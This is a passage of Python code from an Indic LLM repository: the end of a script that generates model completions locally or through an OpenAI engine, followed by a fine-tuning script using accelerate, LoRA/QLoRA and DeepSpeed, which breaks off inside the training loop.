# model_name_or_path and openai_engine should be exclusive.
assert (args.model_name_or_path is None) != (
args.openai_engine is None
), "model_name_or_path and openai_engine should be exclusive."
return args
if __name__ == "__main__":
args = parse_args()
# check if output directory exists
if args.output_file is not None:
output_dir = os.path.dirname(args.output_file)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# load the data
for input_file in args.input_files:
with open(input_file, "r") as f:
instances = [json.loads(x) for x in f.readlines()]
if args.model_name_or_path is not None:
prompts = []
chat_formatting_function = (
dynamic_import_function(args.chat_formatting_function) if args.use_chat_format else None
)
for instance in instances:
if "messages" in instance:
if not args.use_chat_format:
raise ValueError(
"If `messages` is in the instance, `use_chat_format` should be True."
)
assert all(
"role" in message and "content" in message for message in instance["messages"]
), "Each message should have a `role` and a `content` field."
                    prompt = chat_formatting_function(instance["messages"], add_bos=False)
elif "prompt" in instance:
if args.use_chat_format:
messages = [{"role": "user", "content": instance["prompt"]}]
prompt = chat_formatting_function(messages, add_bos=False)
else:
prompt = instance["prompt"]
else:
raise ValueError("Either `messages` or `prompt` should be in the instance.")
prompts.append(prompt)
if args.use_vllm:
model = vllm.LLM(
model=args.model_name_or_path,
tokenizer=args.tokenizer_name_or_path
if args.tokenizer_name_or_path
else args.model_name_or_path,
tokenizer_mode="slow" if args.use_slow_tokenizer else "auto",
)
sampling_params = vllm.SamplingParams(
temperature=args.temperature if args.do_sample else 0,
top_p=args.top_p,
max_tokens=args.max_new_tokens,
)
outputs = model.generate(prompts, sampling_params)
outputs = [it.outputs[0].text for it in outputs]
else:
model, tokenizer = load_hf_lm_and_tokenizer(
model_name_or_path=args.model_name_or_path,
tokenizer_name_or_path=args.tokenizer_name_or_path,
load_in_8bit=args.load_in_8bit,
device_map="balanced_low_0" if torch.cuda.device_count() > 1 else "auto",
gptq_model=args.gptq,
use_fast_tokenizer=not args.use_slow_tokenizer,
)
outputs = generate_completions(
model=model,
tokenizer=tokenizer,
prompts=prompts,
batch_size=args.batch_size,
max_new_tokens=args.max_new_tokens,
do_sample=args.do_sample,
temperature=args.temperature,
top_p=args.top_p,
)
with open(args.output_file, "w") as f:
for instance, output in zip(instances, outputs):
instance["output"] = output
f.write(json.dumps(instance) + "\n")
elif args.openai_engine is not None:
query_openai_chat_model(
engine=args.openai_engine,
instances=instances,
output_path=args.output_file,
batch_size=args.batch_size,
temperature=args.temperature,
top_p=args.top_p,
max_tokens=args.max_new_tokens,
)
else:
raise ValueError("Either model_name_or_path or openai_engine should be provided.")
print("Done.") | 8,008 | Python | .py | 191 | 32.371728 | 150 | 0.602768 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,507 | finetune.py | adithya-s-k_Indic-llm/archives/eval/finetune.py | #!/usr/bin/env python
# coding=utf-8
import argparse
import logging
import math
import os
import json
import random
import datasets
from open_instruct.utils import InitializationScheme
import torch
from functools import partial
from accelerate import Accelerator
from accelerate.logging import get_logger
from accelerate.utils import set_seed
from datasets import load_dataset, load_from_disk
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
import deepspeed
import transformers
from transformers import (
AutoConfig,
AutoModelForCausalLM,
AutoTokenizer,
LlamaTokenizer,
LlamaTokenizerFast,
SchedulerType,
DataCollatorForSeq2Seq,
get_scheduler,
GPTNeoXTokenizerFast,
GPT2Tokenizer,
OPTForCausalLM,
BitsAndBytesConfig,
)
from peft import LoraConfig, TaskType, get_peft_model, prepare_model_for_kbit_training
logger = get_logger(__name__)
def parse_args():
parser = argparse.ArgumentParser(
description="Finetune a transformers model on a causal language modeling task"
)
parser.add_argument(
"--dataset_name",
type=str,
default=None,
help="The name of the dataset to use (via the datasets library).",
)
parser.add_argument(
"--preprocessed_dataset",
action="store_true",
help="If passed, will use a preprocessed dataset which is already tokenized and formatted for causal language modeling.",
)
parser.add_argument(
"--skip_special_tokens",
action="store_true",
help="If passed, will skip special tokens when computing the loss.",
)
parser.add_argument(
"--dataset_config_name",
type=str,
default=None,
help="The configuration name of the dataset to use (via the datasets library).",
)
parser.add_argument(
"--train_file",
nargs="+",
type=str,
default=None,
help="File(s) containing the training data. Usually jsonl in case of raw datasets.",
)
parser.add_argument(
"--val_file",
nargs="+",
type=str,
default=None,
help="File(s) containing the validation data. Usually jsonl in case of raw datasets.",
)
parser.add_argument(
"--model_name_or_path",
type=str,
help="Path to pretrained model or model identifier from huggingface.co/models.",
required=False,
)
parser.add_argument(
"--from_scratch",
action="store_true",
help="If passed, will train the model from scratch instead of from pretrained.",
)
parser.add_argument(
"--config_name",
type=str,
default=None,
help="Pretrained config name or path if not the same as model_name",
)
parser.add_argument(
"--use_lora",
action="store_true",
help="If passed, will use LORA (low-rank parameter-efficient training) to train the model.",
)
parser.add_argument(
"--lora_rank",
type=int,
default=64,
help="The rank of lora.",
)
parser.add_argument(
"--lora_alpha",
type=float,
default=16,
help="The alpha parameter of lora.",
)
parser.add_argument(
"--lora_dropout",
type=float,
default=0.1,
help="The dropout rate of lora modules.",
)
parser.add_argument(
"--lora_target_modules",
type=str,
default=None,
nargs="+",
help="Modules to be augmented."
)
parser.add_argument(
"--use_flash_attn",
action="store_true",
help="If passed, will use flash attention to train the model.",
)
parser.add_argument(
"--tokenizer_name",
type=str,
default=None,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--use_slow_tokenizer",
action="store_true",
help="If passed, will use a slow tokenizer (not backed by the 🤗 Tokenizers library).",
)
parser.add_argument(
"--max_seq_length",
type=int,
default=512,
help="The maximum total sequence length (prompt+completion) of each training example.",
)
parser.add_argument(
"--per_device_train_batch_size",
type=int,
default=8,
help="Batch size (per device) for the training dataloader.",
)
parser.add_argument(
"--per_device_val_batch_size",
type=int,
default=8,
help="Batch size (per device) for the validation dataloader.",
)
parser.add_argument(
"--learning_rate",
type=float,
default=5e-5,
help="Initial learning rate (after the potential warmup period) to use.",
)
parser.add_argument("--weight_decay", type=float, default=0.0, help="Weight decay to use.")
parser.add_argument(
"--num_train_epochs",
type=int,
default=3,
help="Total number of training epochs to perform.",
)
parser.add_argument(
"--max_train_steps",
type=int,
default=None,
help="Total number of training steps to perform. If provided, overrides num_train_epochs.",
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument(
"--lr_scheduler_type",
type=SchedulerType,
default="linear",
help="The scheduler type to use.",
choices=[
"linear",
"cosine",
"cosine_with_restarts",
"polynomial",
"constant",
"constant_with_warmup",
],
)
parser.add_argument(
"--warmup_ratio",
type=float,
default=0,
help="Ratio of total training steps used for warmup.",
)
parser.add_argument(
"--output_dir", type=str, default=None, help="Where to store the final model."
)
parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.")
parser.add_argument(
"--preprocessing_num_workers",
type=int,
default=None,
help="The number of processes to use for the preprocessing.",
)
parser.add_argument(
"--overwrite_cache",
action="store_true",
help="Overwrite the cached training and evaluation sets",
)
parser.add_argument(
"--checkpointing_steps",
type=str,
default=None,
help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.",
)
parser.add_argument(
"--logging_steps",
type=int,
default=None,
help="Log the training loss and learning rate every logging_steps steps.",
)
parser.add_argument(
"--resume_from_checkpoint",
type=str,
default=None,
help="If the training should continue from a checkpoint folder.",
)
parser.add_argument(
"--with_tracking",
action="store_true",
help="Whether to enable experiment trackers for logging.",
)
parser.add_argument(
"--report_to",
type=str,
default="all",
help=(
'The integration to report the results and logs to. Supported platforms are `"tensorboard"`,'
' `"wandb"`, `"comet_ml"` and `"clearml"`. Use `"all"` (default) to report to all integrations.'
"Only applicable when `--with_tracking` is passed."
),
)
parser.add_argument(
"--low_cpu_mem_usage",
action="store_true",
help=(
"It is an option to create the model as an empty shell, then only materialize its parameters when the pretrained weights are loaded."
"If passed, LLM loading time and RAM consumption will be benefited."
),
)
parser.add_argument(
"--gradient_checkpointing",
action="store_true",
help=("Turn on gradient checkpointing. Saves memory but slows training."),
)
parser.add_argument(
"--use_qlora",
action="store_true",
help=(
"Use qLoRA training - main thing is initialising model in quantised form. Not compatible with deepspeed."
),
)
parser.add_argument(
"--clip_grad_norm",
type=float,
default=-1,
help="Clip gradient norm. Not compatible with deepspeed (use deepspeed config instead).",
)
parser.add_argument(
"--use_8bit_optimizer",
action="store_true",
help="Use 8bit optimizer from bitsandbytes. Not compatible with deepspeed (use deepspeed config instead).",
)
parser.add_argument(
"--embedding_idx_to_freeze_up_to",
type=int,
default=-1,
help="The index of the embedding layer to freeze up to. -1 means no embedding layer will be frozen.",
)
parser.add_argument(
"--components_to_freeze",
nargs="+",
type=str,
default=None,
help="The components to freeze. If not specified, nothing will be frozen. Possible values can be embed_tokens, layers, layers.N (N=0 to 31), self_attn, (q/k/v)_proj, rotary_emb, mlp, gate_proj, up_proj, down_proj, lm_head, norm, input_layernorm, post_attention_layernorm.",
)
parser.add_argument(
"--init_scheme",
type=str,
default="normal",
help="Specify which initialization scheme to use for models trained from scratched",
choices=[
"normal",
"scaled_normal",
"xavier_uniform",
"xavier_normal",
"wang_init",
"small_init",
"small_and_wang_init",
"scaled_biderman",
],
)
args = parser.parse_args()
# Sanity checks
if args.dataset_name is None and args.train_file is None:
raise ValueError("Need either a dataset name or a training file.")
else:
if args.train_file is not None:
if args.preprocessed_dataset:
print("Preprocessed dataset will be loaded from `train_file` and `val_file`.")
else:
extension = args.train_file[0].split(".")[-1]
assert extension in ["json", "jsonl"], "`train_file` should be a json/jsonl file."
if args.val_file is not None:
extension = args.val_file[0].split(".")[-1]
assert extension in ["json", "jsonl"], "`val_file` should be a json/jsonl file."
return args
def identity(example, tokenizer, max_seq_length):
return example
def encode_with_prompt_completion_format(example, tokenizer, max_seq_length):
"""
Here we assume each example has 'prompt' and 'completion' fields.
We concatenate prompt and completion and tokenize them together because otherwise prompt will be padded/trancated
and it doesn't make sense to follow directly with the completion.
"""
# if prompt doesn't end with space and completion doesn't start with space, add space
if not example["prompt"].endswith((" ", "\n", "\t")) and not example["completion"].startswith(
(" ", "\n", "\t")
):
example_text = example["prompt"] + " " + example["completion"]
else:
example_text = example["prompt"] + example["completion"]
example_text = example_text + tokenizer.eos_token
tokenized_example = tokenizer(
example_text, return_tensors="pt", max_length=max_seq_length, truncation=True
)
input_ids = tokenized_example.input_ids
labels = input_ids.clone()
tokenized_prompt = tokenizer(
example["prompt"], return_tensors="pt", max_length=max_seq_length, truncation=True
)
# mask the prompt part for avoiding loss
labels[:, : tokenized_prompt.input_ids.shape[1]] = -100
attention_mask = torch.ones_like(input_ids)
return {
"input_ids": input_ids.flatten(),
"labels": labels.flatten(),
"attention_mask": attention_mask.flatten(),
}
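
# Resulting supervision mask, sketched (token boundaries are illustrative):
#   prompt tokens     -> labels = -100 (ignored by the cross-entropy loss)
#   completion tokens -> labels = input_ids (trained on), ending with eos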
def encode_with_messages_format(example, tokenizer, max_seq_length):
"""
Here we assume each example has a 'messages' field Each message is a dict with 'role' and 'content' fields.
We concatenate all messages with the roles as delimiters and tokenize them together.
"""
messages = example["messages"]
if len(messages) == 0:
raise ValueError("messages field is empty.")
def _concat_messages(messages):
message_text = ""
for message in messages:
if message["role"] == "system":
message_text += "<|system|>\n" + message["content"].strip() + "\n"
elif message["role"] == "user":
message_text += "<|user|>\n" + message["content"].strip() + "\n"
elif message["role"] == "assistant":
message_text += (
"<|assistant|>\n" + message["content"].strip() + tokenizer.eos_token + "\n"
)
else:
raise ValueError("Invalid role: {}".format(message["role"]))
return message_text
example_text = _concat_messages(messages).strip()
tokenized_example = tokenizer(
example_text, return_tensors="pt", max_length=max_seq_length, truncation=True
)
input_ids = tokenized_example.input_ids
labels = input_ids.clone()
# mask the non-assistant part for avoiding loss
for message_idx, message in enumerate(messages):
if message["role"] != "assistant":
if message_idx == 0:
message_start_idx = 0
else:
message_start_idx = tokenizer(
_concat_messages(messages[:message_idx]),
return_tensors="pt",
max_length=max_seq_length,
truncation=True,
).input_ids.shape[1]
if message_idx < len(messages) - 1 and messages[message_idx + 1]["role"] == "assistant":
# here we also ignore the role of the assistant
messages_so_far = _concat_messages(messages[: message_idx + 1]) + "<|assistant|>\n"
else:
messages_so_far = _concat_messages(messages[: message_idx + 1])
message_end_idx = tokenizer(
messages_so_far, return_tensors="pt", max_length=max_seq_length, truncation=True
).input_ids.shape[1]
labels[:, message_start_idx:message_end_idx] = -100
if message_end_idx >= max_seq_length:
break
attention_mask = torch.ones_like(input_ids)
return {
"input_ids": input_ids.flatten(),
"labels": labels.flatten(),
"attention_mask": attention_mask.flatten(),
}
def save_with_accelerate(accelerator, model, tokenizer, output_dir, args):
unwrapped_model = accelerator.unwrap_model(model)
# When doing multi-gpu training, we need to use accelerator.get_state_dict(model) to get the state_dict.
# Otherwise, sometimes the model will be saved with only part of the parameters.
# Also, accelerator needs to use the wrapped model to get the state_dict.
state_dict = accelerator.get_state_dict(model)
if args.use_lora:
# When using lora, the unwrapped model is a PeftModel, which doesn't support the is_main_process
# and has its own save_pretrained function for only saving lora modules.
# We have to manually specify the is_main_process outside the save_pretrained function.
if accelerator.is_main_process:
unwrapped_model.save_pretrained(output_dir, state_dict=state_dict)
if args.embedding_idx_to_freeze_up_to != -1:
# We need to save the embeddings and lm head as well
embeddings = deepspeed.utils.safe_get_full_fp32_param(
model.module.get_input_embeddings().weight
)
if accelerator.is_main_process:
accelerator.save(embeddings, os.path.join(output_dir, "embeddings.pkl"))
del embeddings
embeddings = deepspeed.utils.safe_get_full_fp32_param(
model.module.get_output_embeddings().weight
)
if accelerator.is_main_process:
accelerator.save(embeddings, os.path.join(output_dir, "lm_head.pkl"))
del embeddings
torch.cuda.empty_cache()
else:
unwrapped_model.save_pretrained(
output_dir,
is_main_process=accelerator.is_main_process,
save_function=accelerator.save,
state_dict=state_dict,
)
def main():
args = parse_args()
# A hacky way to make llama work with flash attention
# if args.use_flash_attn:
# transformers library now supports flash attention for llama 2 model
# no need to add flash attention monkey patch anymore
# from llama_flash_attn_monkey_patch import replace_llama_attn_with_flash_attn
# replace_llama_attn_with_flash_attn()
# from bloom_flash_attn_monkey_patch import replace_bloom_attn_with_flash_attn
# replace_bloom_attn_with_flash_attn()
# Initialize the accelerator. We will let the accelerator handle device placement for us in this example.
# If we're using tracking, we also need to initialize it here and it will by default pick up all supported trackers
# in the environment
accelerator_log_kwargs = {}
if args.with_tracking:
accelerator_log_kwargs["log_with"] = args.report_to
accelerator_log_kwargs["project_dir"] = args.output_dir
accelerator = Accelerator(
gradient_accumulation_steps=args.gradient_accumulation_steps, **accelerator_log_kwargs
)
# Make one log on every process with the configuration for debugging.
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
logger.info(accelerator.state, main_process_only=False)
if accelerator.is_local_main_process:
datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
else:
datasets.utils.logging.set_verbosity_error()
transformers.utils.logging.set_verbosity_error()
# If passed along, set the training seed now.
if args.seed is not None:
set_seed(args.seed)
if accelerator.is_main_process:
if args.output_dir is not None:
os.makedirs(args.output_dir, exist_ok=True)
# save the script arguments
with open(os.path.join(args.output_dir, "hparams.json"), "w") as fp:
fp.write(json.dumps(vars(args), indent=2))
accelerator.wait_for_everyone()
if args.preprocessed_dataset:
# load the preprocessed data from file on the disk if available
print("Loading preprocessed dataset...")
raw_datasets = {}
all_train_raw_datasets = []
for dataset_name in args.train_file:
all_train_raw_datasets.append(load_from_disk(dataset_name))
raw_datasets["train"] = datasets.concatenate_datasets(all_train_raw_datasets)
raw_datasets["train"].shuffle()
if args.val_file is not None:
all_val_raw_datasets = []
for dataset_name in args.val_file:
all_val_raw_datasets.append(load_from_disk(dataset_name))
raw_datasets["validation"] = datasets.concatenate_datasets(all_val_raw_datasets)
raw_datasets["validation"].shuffle()
else:
if args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(args.dataset_name, args.dataset_config_name)
else:
data_files = {}
dataset_args = {}
if args.train_file is not None:
data_files["train"] = args.train_file
raw_datasets = load_dataset("json", data_files=data_files, **dataset_args)
# Load pretrained model and tokenizer
if args.config_name:
config = AutoConfig.from_pretrained(args.config_name)
elif args.model_name_or_path:
config = AutoConfig.from_pretrained(args.model_name_or_path)
else:
raise ValueError(
"You are instantiating a new config instance from scratch. This is not supported by this script."
)
if args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(
args.tokenizer_name, use_fast=not args.use_slow_tokenizer
)
elif args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(
args.model_name_or_path, use_fast=not args.use_slow_tokenizer
)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
if args.model_name_or_path:
        use_flash_attention_2 = (
            args.use_flash_attn if "bloom" not in args.model_name_or_path else False
        )
if args.use_qlora:
bnb_config = BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_use_double_quant=True,
bnb_4bit_quant_type="nf4",
bnb_4bit_compute_dtype=torch.bfloat16,
)
device_index = accelerator.local_process_index
device_map = {"": device_index} # force data-parallel training.
model = AutoModelForCausalLM.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
load_in_4bit=True,
quantization_config=bnb_config,
device_map=device_map,
torch_dtype=torch.bfloat16,
use_flash_attention_2=use_flash_attention_2,
)
else:
model = AutoModelForCausalLM.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
low_cpu_mem_usage=args.low_cpu_mem_usage,
use_flash_attention_2=use_flash_attention_2,
)
else:
logger.info("Training new model from scratch")
model = AutoModelForCausalLM.from_config(config)
config.init_scheme = args.init_scheme
initialize_model_weights = InitializationScheme(config)
initialize_model_weights._init_weights(model)
logger.info("Total parameters: {}".format(model.num_parameters()))
if args.components_to_freeze is not None:
for component in args.components_to_freeze:
for model_component, parameter in model.named_parameters():
if component in model_component:
parameter.requires_grad = False
print("Freezing {}".format(model_component))
# no default pad token for llama!
# here we add all special tokens again, because the default ones are not in the special_tokens_map
if args.skip_special_tokens:
pass
else:
if isinstance(tokenizer, LlamaTokenizer) or isinstance(tokenizer, LlamaTokenizerFast):
num_added_tokens = tokenizer.add_special_tokens(
{
"bos_token": "<s>",
"eos_token": "</s>",
"unk_token": "<unk>",
"pad_token": "<pad>",
}
)
assert num_added_tokens in [
0,
1,
], "LlamaTokenizer should only add one special token - the pad_token, or no tokens if pad token present."
elif isinstance(tokenizer, GPTNeoXTokenizerFast):
num_added_tokens = tokenizer.add_special_tokens(
{
"pad_token": "<pad>",
}
)
assert (
num_added_tokens == 1
), "GPTNeoXTokenizer should only add one special token - the pad_token."
elif isinstance(tokenizer, GPT2Tokenizer) and isinstance(model, OPTForCausalLM):
num_added_tokens = tokenizer.add_special_tokens({"unk_token": "<unk>"})
# We resize the embeddings only when necessary to avoid index errors. If you are creating a model from scratch
# on a small vocab and want a smaller embedding size, remove this test.
embedding_size = model.get_input_embeddings().weight.shape[0]
if len(tokenizer) > embedding_size:
model.resize_token_embeddings(len(tokenizer))
if args.use_lora:
if args.use_qlora:
model = prepare_model_for_kbit_training(
model, use_gradient_checkpointing=args.gradient_checkpointing
)
logger.info("Initializing LORA model...")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
inference_mode=False,
r=args.lora_rank,
lora_alpha=args.lora_alpha,
lora_dropout=args.lora_dropout,
target_modules=args.lora_target_modules,
)
model = get_peft_model(model, peft_config)
# peft breaks flash attention due to casting norms to fp32. This fixes it back up.
# See https://github.com/huggingface/peft/issues/790
# from llama_flash_attn_monkey_patch import upcast_layer_for_flash_attention
# model = upcast_layer_for_flash_attention(model, torch.bfloat16)
model.print_trainable_parameters()
if args.embedding_idx_to_freeze_up_to != -1:
print("Freezing embeddings up to index {}".format(args.embedding_idx_to_freeze_up_to))
def hook(grad):
grad[: args.embedding_idx_to_freeze_up_to].zero_()
return grad
if args.use_lora:
print(
"Setting embeddings and lm head as trainable and then we will remove gradients up to index {}".format(
args.embedding_idx_to_freeze_up_to
)
)
model.get_input_embeddings().weight.requires_grad = True
model.get_output_embeddings().weight.requires_grad = True
model.print_trainable_parameters()
model.get_input_embeddings().weight.register_hook(hook)
model.get_output_embeddings().weight.register_hook(hook)
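        # A minimal, self-contained sketch of the gradient hook above on a toy
        # embedding (illustrative only, not part of the training flow): rows below
        # the freeze index receive zero gradient and therefore never change.
        #
        #   import torch
        #   emb = torch.nn.Embedding(5, 4)
        #   def zero_frozen_rows(grad):
        #       grad = grad.clone()  # avoid mutating the autograd-provided tensor
        #       grad[:3].zero_()     # freeze rows 0..2
        #       return grad
        #   emb.weight.register_hook(zero_frozen_rows)
        #   emb(torch.tensor([0, 4])).sum().backward()
        #   assert emb.weight.grad[:3].abs().sum() == 0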
# Preprocessing the datasets.
if args.preprocessed_dataset:
encode_function = partial(
identity,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
)
with accelerator.main_process_first():
lm_datasets = {}
for split in raw_datasets.keys():
lm_datasets[split] = raw_datasets[split].map(
encode_function,
batched=False,
num_proc=args.preprocessing_num_workers,
load_from_cache_file=not args.overwrite_cache,
remove_columns=[
name
for name in raw_datasets["train"].column_names
if name not in ["input_ids", "labels", "attention_mask"]
],
desc="Reformatting instruction data",
)
lm_datasets[split].set_format(type="pt")
train_dataset = lm_datasets["train"]
if args.val_file is not None:
val_dataset = lm_datasets["validation"]
else:
if (
"prompt" in raw_datasets["train"].column_names
and "completion" in raw_datasets["train"].column_names
):
encode_function = partial(
encode_with_prompt_completion_format,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
)
elif "messages" in raw_datasets["train"].column_names:
encode_function = partial(
encode_with_messages_format,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
)
else:
raise ValueError(
"You need to have either 'prompt'&'completion' or 'messages' in your column names."
)
with accelerator.main_process_first():
lm_datasets = raw_datasets.map(
encode_function,
batched=False,
num_proc=args.preprocessing_num_workers,
load_from_cache_file=not args.overwrite_cache,
remove_columns=[
name
for name in raw_datasets["train"].column_names
if name not in ["input_ids", "labels", "attention_mask"]
],
desc="Tokenizing and reformatting instruction data",
)
lm_datasets.set_format(type="pt")
lm_datasets = lm_datasets.filter(lambda example: (example["labels"] != -100).any())
train_dataset = lm_datasets["train"]
if args.val_file is not None:
val_dataset = lm_datasets["validation"]
# Log a few random samples from the training set:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
# DataLoaders creation:
train_dataloader = DataLoader(
train_dataset,
shuffle=True,
collate_fn=DataCollatorForSeq2Seq(tokenizer=tokenizer, model=model, padding="longest"),
batch_size=args.per_device_train_batch_size,
)
if args.val_file is not None:
val_dataloader = DataLoader(
val_dataset,
shuffle=False,
collate_fn=DataCollatorForSeq2Seq(tokenizer=tokenizer, model=model, padding="longest"),
batch_size=args.per_device_val_batch_size,
)
# Optimizer
# Split weights in two groups, one with weight decay and the other not.
no_decay = ["bias", "layer_norm.weight"]
optimizer_grouped_parameters = [
{
"params": [
p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)
],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
if args.use_qlora:
from bitsandbytes.optim import AdamW
optimizer = AdamW(
optimizer_grouped_parameters,
lr=args.learning_rate,
optim_bits=8 if args.use_8bit_optimizer else 32,
is_paged=True,
)
else:
optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.learning_rate)
# Scheduler and math around the number of training steps.
overrode_max_train_steps = False
num_update_steps_per_epoch = math.ceil(
len(train_dataloader) / args.gradient_accumulation_steps / accelerator.num_processes
)
if args.max_train_steps is None:
args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
overrode_max_train_steps = True
    # Create the learning rate scheduler.
    # Note: accelerator's wrapper calls the real scheduler's .step() once per process (i.e. `num_processes`
    # times per optimizer update), because it assumes the scheduler was initialized for the entire training
    # set. In data-parallel training each process only sees 1/num_processes of the data, so the scheduler
    # must be stepped multiple times for the total number of updates to match num_training_steps.
    # We therefore size num_training_steps either from the entire training set (when epochs are specified)
    # or by multiplying num_training_steps by num_processes so that the totals line up.
num_training_steps_for_scheduler = (
args.max_train_steps
if overrode_max_train_steps
else args.max_train_steps * accelerator.num_processes
)
lr_scheduler = get_scheduler(
name=args.lr_scheduler_type,
optimizer=optimizer,
num_training_steps=num_training_steps_for_scheduler,
num_warmup_steps=int(num_training_steps_for_scheduler * args.warmup_ratio),
)
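    # Worked example of the step math above (illustrative numbers): with
    # len(train_dataloader) == 1024 batches, gradient_accumulation_steps == 4,
    # num_processes == 8 and num_train_epochs == 2:
    #   num_update_steps_per_epoch = ceil(1024 / 4 / 8) = 32
    #   max_train_steps (left unset) = 2 * 32 = 64, so overrode_max_train_steps is True
    #   num_training_steps_for_scheduler = 64, and warmup_ratio == 0.03 would give
    #   num_warmup_steps = int(64 * 0.03) = 1
    # Had --max_train_steps been passed explicitly, the scheduler would instead be
    # sized to max_train_steps * num_processes to absorb the per-process .step() calls.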
if not args.use_lora and args.gradient_checkpointing:
print("Using gradient checkpointing with full fine tuning")
model.gradient_checkpointing_enable()
# Prepare everything with `accelerator`.
if args.val_file is not None:
model, optimizer, train_dataloader, val_dataloader, lr_scheduler = accelerator.prepare(
model, optimizer, train_dataloader, val_dataloader, lr_scheduler
)
else:
model, optimizer, train_dataloader, lr_scheduler = accelerator.prepare(
model, optimizer, train_dataloader, lr_scheduler
)
# # We need to recalculate our total training steps as the size of the training dataloader may have changed.
# num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
# if overrode_max_train_steps:
# args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
# # Afterwards we recalculate our number of training epochs
# args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch)
# Figure out how many steps we should save the Accelerator states
checkpointing_steps = args.checkpointing_steps
if checkpointing_steps is not None and checkpointing_steps.isdigit():
checkpointing_steps = int(checkpointing_steps)
# We need to initialize the trackers we use, and also store our configuration.
# The trackers initializes automatically on the main process.
if args.with_tracking:
experiment_config = vars(args)
# TensorBoard cannot log Enums, need the raw value
experiment_config["lr_scheduler_type"] = experiment_config["lr_scheduler_type"].value
accelerator.init_trackers("indic_instruct", experiment_config)
# Train!
total_batch_size = (
args.per_device_train_batch_size
* accelerator.num_processes
* args.gradient_accumulation_steps
)
logger.info("***** Running training *****")
logger.info(f" Num examples = {len(train_dataset)}")
logger.info(f" Num Epochs = {args.num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {args.per_device_train_batch_size}")
logger.info(
f" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}"
)
logger.info(f" Gradient Accumulation steps = {args.gradient_accumulation_steps}")
logger.info(f" Total optimization steps = {args.max_train_steps}")
# Only show the progress bar once on each machine.
progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)
completed_steps = 0
starting_epoch = 0
# Potentially load in the weights and states from a previous save
if args.resume_from_checkpoint:
        if args.resume_from_checkpoint is not None and args.resume_from_checkpoint != "":
checkpoint_path = args.resume_from_checkpoint
path = os.path.basename(args.resume_from_checkpoint)
else:
# Get the most recent checkpoint
dirs = [f.name for f in os.scandir(os.getcwd()) if f.is_dir()]
dirs.sort(key=os.path.getctime)
path = dirs[-1] # Sorts folders by date modified, most recent checkpoint is the last
checkpoint_path = path
path = os.path.basename(checkpoint_path)
accelerator.print(f"Resumed from checkpoint: {checkpoint_path}")
        accelerator.load_state(checkpoint_path)
# Extract `epoch_{i}` or `step_{i}`
training_difference = os.path.splitext(path)[0]
if "epoch" in training_difference:
starting_epoch = int(training_difference.replace("epoch_", "")) + 1
resume_step = None
completed_steps = starting_epoch * num_update_steps_per_epoch
else:
# need to multiply `gradient_accumulation_steps` to reflect real steps
resume_step = (
int(training_difference.replace("step_", "")) * args.gradient_accumulation_steps
)
starting_epoch = resume_step // len(train_dataloader)
completed_steps = resume_step // args.gradient_accumulation_steps
resume_step -= starting_epoch * len(train_dataloader)
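            # Worked example (illustrative numbers): resuming from "step_150" with
            # gradient_accumulation_steps == 4 and len(train_dataloader) == 500:
            #   resume_step = 150 * 4 = 600 dataloader batches
            #   starting_epoch = 600 // 500 = 1
            #   completed_steps = 600 // 4 = 150
            #   resume_step -= 1 * 500  ->  skip the first 100 batches of epoch 1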
# update the progress_bar if load from checkpoint
progress_bar.update(completed_steps)
for epoch in range(starting_epoch, args.num_train_epochs):
model.train()
total_loss = 0
if args.resume_from_checkpoint and epoch == starting_epoch and resume_step is not None:
# We skip the first `n` batches in the dataloader when resuming from a checkpoint
active_dataloader = accelerator.skip_first_batches(train_dataloader, resume_step)
else:
active_dataloader = train_dataloader
for step, batch in enumerate(active_dataloader):
            # For a preprocessed dataset that does not store labels, fall back to using the input_ids as labels.
if "labels" not in batch:
batch["labels"] = batch["input_ids"].clone()
if "attention_mask" not in batch:
batch["attention_mask"] = torch.ones_like(batch["input_ids"])
with accelerator.accumulate(model):
outputs = model(**batch, use_cache=False)
loss = outputs.loss
# We keep track of the loss at each logged step
total_loss += loss.detach().float()
accelerator.backward(loss)
# clip gradient norm. don't do this with deepspeed
if accelerator.sync_gradients and args.clip_grad_norm > 0:
accelerator.clip_grad_norm_(model.parameters(), args.clip_grad_norm)
optimizer.step()
optimizer.zero_grad()
lr_scheduler.step()
# Checks if the accelerator has performed an optimization step behind the scenes
if accelerator.sync_gradients:
progress_bar.update(1)
completed_steps += 1
